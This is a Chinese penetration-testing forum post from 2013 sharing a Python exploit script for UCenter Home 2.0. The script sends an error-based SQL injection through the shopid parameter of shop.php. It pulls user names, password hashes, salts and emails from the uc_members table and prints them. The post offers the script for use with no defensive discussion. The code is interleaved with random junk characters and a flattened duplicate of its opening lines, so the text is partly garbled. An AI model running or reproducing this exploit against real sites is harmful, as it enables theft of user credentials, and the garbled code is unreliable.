找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 UCenter Home 2.0 EXP
返回列表 发新帖
查看: 2209|回复: 0
打印 上一主题 下一主题

UCenter Home 2.0 EXP

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-1-23 09:18:17 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
#!/usr/bin/envpython importsys importurllib2 importre definfo(): print'From:http://www.exploit-db.com/exploits/14997/' print 'http://www.hake.cc/Web_loudong/' print'changed:qiaoy' print'exp:' print'./UCenter_Home_2.0.pysite' defmain(): ifl
, _4 P6 k( q1 T* N0 D' i3 }
6 J, z/ i3 Y1 _, @* {, [; D  |
6 W5 J" H. K/ |. {7 s0 ?, X, k#!/usr/bin/env python  
: x5 M. k" F% K; o8 c2 |4 r; p" \; ] # D3 h5 d' v) w" C+ r. b. [
import sys  
5 I% J& T+ `0 K; D- Z% p4 q! Eimport urllib2  
: z/ s1 N' Q6 e* L' m& n' F/ Uimport re  9 V* t  d( r: ?9 E$ v  Q
7 A, e: f' _6 Z  D; A: b& Q
def info():  : S8 c. d8 j  @4 p, o8 r  o
    print 'From:http://www.exploit-db.com/exploits/14997/' + d9 Y4 [( y9 t! x2 L9 a
    print 'http://www.hake.cc/Web_loudong/'   Z% F& D2 X# P2 k  A: @, W" z9 I
    print 'changed:qiaoy'  
7 p. ]3 E4 @& Q, I    print 'exp:'  
8 w* R; i' ^- S9 Z) l    print ' ./UCenter_Home_2.0.py site'  
) F5 _/ T2 ~: _7 | 9 G( U8 [: _$ o5 T
def main():  
0 P( {7 x  M6 T) B    if len(sys.argv) != 2:  
. H. E% ]/ N  A, K) B& \: g0 N        info()  ( ]& {/ c8 h6 x. R  A1 d
    else:  / U! ]' Z% u% S* }7 ~) ?
        site = sys.argv[1]  ' ?" Y( x, o# K+ p, ]( O
        if site[0:7] == 'http://':  
6 n  H8 N- A( J. [            sitesite =site  . |) ~& i4 J1 j  [8 e7 y6 p" r
        elif site[0:8] == 'https://':  
0 B: t( l  f6 ^+ t3 {9 F# ]; Y5 f1 c            sitesite = site  
8 ^1 a* ^: K) T& s! V3 n, g% E        else:  
/ Y  O3 a: H4 ^" i& k            site = 'http://'+site  
0 ~2 b% v" s( ^4 k        try:  
/ r. {1 N; Q, u  X5 r            url = site+'/shop.php?ac=view&shopid=50534+and+(select+1+from(select+count(*),concat((select+(select+(select+concat(0x7e,0x27,cast(concat(uid,0x3a,username,0x3a,password,0x3a,salt,0x3a,email)+as+char),0x27,0x7e)+from+ucenter.uc_members+LIMIT+0,1))+from+information_schema.tables+limit+0,1),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a)+and+11=1'  + o8 w' p8 Y0 t& ?# m" N
            Value = urllib2.urlopen(url).read()    k( g/ N& G7 W9 J- c
            Msg = re.findall(r'Duplicate entry \'~\'(.*?)\' for key',Value)[0]  
& w5 T& U* b' k* ^$ R' Z8 y            hacked = Msg.split(':')  
, h" G$ e$ C% s            print 'Name:    '+hacked[1]  ! k1 r5 J% v1 B5 Q
            print 'Passwd:  '+hacked[2]  
& N% c3 n# @8 `: n; _, k. Z3 h) j            print 'salt:    '+hacked[3]  
8 S; A8 B5 }8 C3 E            print 'email:   '+hacked[4]  
/ x$ b4 e$ W! B- V' _- I5 B        except:  - t, T7 J* ~6 K# S/ l  J9 D1 a
            print 'Sorry,I can\'t work............'  
: e3 Z" R/ k9 Q! g. q+ |( }" ~4 t- B ' s' O$ h( o9 |: M0 d1 c
if __name__ == '__main__':  ) e1 B* _4 I% q+ I7 b1 a5 C: e
    main()
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表